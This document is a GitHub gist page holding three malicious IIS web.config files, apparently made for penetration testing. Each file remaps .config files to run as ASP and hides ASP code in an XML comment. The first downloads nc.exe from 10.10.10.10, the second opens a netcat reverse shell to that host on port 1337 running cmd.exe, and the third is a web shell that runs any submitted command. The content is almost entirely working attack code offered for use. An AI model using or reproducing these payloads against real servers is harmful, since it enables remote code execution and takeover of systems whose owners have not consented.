-
-
Save michpice/d73d9000af05e8673700a1f375ebefa5 to your computer and use it in GitHub Desktop.
Revisions
-
gazcbm created this gist
Jul 11, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,53 @@ <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&"->") ' Set your settings strFileURL = "http://10.10.10.10/nc.exe" strHDLocation = "C:\users\test\documents\nc.exe" ' Fetch the file Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open "GET", strFileURL, false objXMLHTTP.send() If objXMLHTTP.Status = 200 Then Set objADOStream = CreateObject("ADODB.Stream") objADOStream.Open objADOStream.Type = 1 'adTypeBinary objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position = 0 'Set the stream position to the start Set objFSO = Createobject("Scripting.FileSystemObject") If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation Set objFSO = Nothing objADOStream.SaveToFile strHDLocation objADOStream.Close Set objADOStream = Nothing End if Set objXMLHTTP = Nothing Response.write("<!-"&"-") %> --> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,29 @@ <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&"->") Set objShell = CreateObject("WScript.Shell") objShell.Exec("c:\users\test\documents\nc.exe -d 10.10.10.10 1337 -e c:\windows\system32\cmd.exe") Response.write("<!-"&"-") %> --> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,65 @@ <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- <% Response.write("-"&"->")%> <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <BODY> <FORM action="" method="GET"> <input type="text" name="cmd" size=45 value="<%= szCMD %>"> <input type="submit" value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables("server_name"))%> <p> <b>The server's port:</b> <%Response.Write(Request.ServerVariables("server_port"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("server_software"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD) Response.Write(thisDir)%> </p> <br> </BODY> <%Response.write("<!-"&"-") %> -->